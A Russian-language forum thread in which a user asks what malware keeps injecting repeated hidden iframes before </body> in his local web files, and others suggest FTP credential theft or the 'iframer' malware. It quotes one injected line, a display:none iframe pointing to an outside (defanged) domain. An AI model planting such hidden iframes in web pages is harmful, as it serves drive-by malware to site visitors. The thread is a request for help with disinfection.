Подскажите, что я за вирь поймал?

[Oizo]

Вообщем вписывает в конец *htm* asp и т.д интернет-текстовых файлов (прям перед </body>, если этого тега нет, все в порядке) вот такой фреймы повторяющиеся, дохуя раз:
iframe src="xttp://jL.chura.pl/rc/" style="display:none"

Причем в памяти ничего подозрительного не висит, антивири (попробывал avp/nod/avast/drweb) - молчат, попробывал несколько антиспайварок - тоже глухо, и если файло открыть, стереть их и снова открыть - опять строки есть, причем разными редакторами пробывал.

На одном форуме пишут что форматте нах все, переустанавливайте винду, иначе типа никак... А на остальных муть какую-то вообще, вообщем глухо или я плохо ищу. А мне пиздец как переустанавливать лень. У меня Win7

Если кто чем поможет, заранее спасибо.

[gcc]

так а пассы от фтп менял?
или это локально паги правит?

[Oizo]

Я не пользуюсь ftp уже давно, так что не знаю.

[iSeoBot]

ну у нода он уже в блек листе.очередная связка,не похоже..интересно


много пишут про это

[Oizo]

Это я читал что пишут, вроде как поиском за много лет научился пользоваться . Тольку только нет, все что рекомендовали, попробывал, и самое главное непонятно че заражено... если это virut, который аттачится к системным файлам типа svchost, тогда его ловить должны антивири, а так даже и не знаю что это

[2good4you2]

Это назвывается iframer

[Oizo]

Дык ифреймер сколько лет уже в базах. Сейчас еще раз на очень всякий случай проверил системные папки и пямять cureit-ом - нет, не ифреймер, по крайней мере не в том виде, в котором содержится в базах АВ

[iSeoBot]

Oizo,научился пользоватся поиском? а что тогда не юзаешь его? как минимум два форума я нашёл где описывается что это за херня и способы её лечения.ну раз уж поиском умеешь пользоватся,ищи

[Oizo]

Ну что ты сразу так жестко, может что и пропустил.
Я ж писал что попробывал то что пишут в сети, глухо. Если что нашел - поделись плз

[iSeoBot]

вот одно из решений